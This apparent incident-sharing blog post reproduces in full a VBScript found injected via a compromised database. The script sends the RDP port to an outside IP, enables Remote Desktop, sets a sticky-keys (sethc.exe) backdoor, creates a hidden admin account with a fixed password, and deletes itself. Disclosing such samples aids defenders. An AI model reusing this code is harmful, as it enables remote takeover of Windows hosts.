数据库被入侵了，被注入的脚步如下

最新推荐文章于 2025-05-28 09:14:39 发布

冰上浮云

最新推荐文章于 2025-05-28 09:14:39 发布

阅读量1.9k

点赞数

CC 4.0 BY-SA版权

分类专栏： windows运维文章标签： mysql 安全

本文链接：https://blog.youkuaiyun.com/clj198606061111/article/details/42551053

windows运维专栏收录该内容

4 篇文章

订阅专栏

本文分析了一段使用VBScript编写的恶意脚本，该脚本尝试修改注册表设置、启动远程桌面服务并执行一系列系统操作。此外，还展示了如何创建用户及更改密码等操作。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

on error resume next
Set fso8 = CreateObject("Scripting.FileSystemObject")
Set ObjFSO2 = CreateObject("Scripting.FileSystemObject")
If fso8.FileExists("C:\WINDOWS\Help\cnwb.html") Then 
ObjFSO2.DeleteFile Wscript.ScriptFullName
WScript.quit
else
end if

Set OperationRegistry=WScript.createObject("WScript.Shell") 
Dim TSPort,TSState,TSRegPath 
TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" 
TSPort=OperationRegistry.RegRead(TSRegPath) 
Set xPost=CreateObject("Microsoft.XMLHTTP") 
xPost.Open "GET","http://42.51.151.7:8002/mof.asp?IPnumber=" & TSPort,0 
xPost.Send() 


set obj=wscript.createObject("wscript.shell") 
obj.Run "cmd /c sc config TermService start= auto",vbhide
obj.Run "cmd /c sc start TermService",vbhide
obj.Run "cmd /c start c:/windows/system/const.exe",vbhide



Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\taskmgr.exe","REG_SZ"





Set o=CreateObject("Shell.Users")
Set z=o.create("winhelp")
z.changePassword "85760042aa!@#",""
z.setting("AccountType")=3

Set ObjFSO = CreateObject("Scripting.FileSystemObject")
ObjFSO.DeleteFile Wscript.ScriptFullName
WScript.quit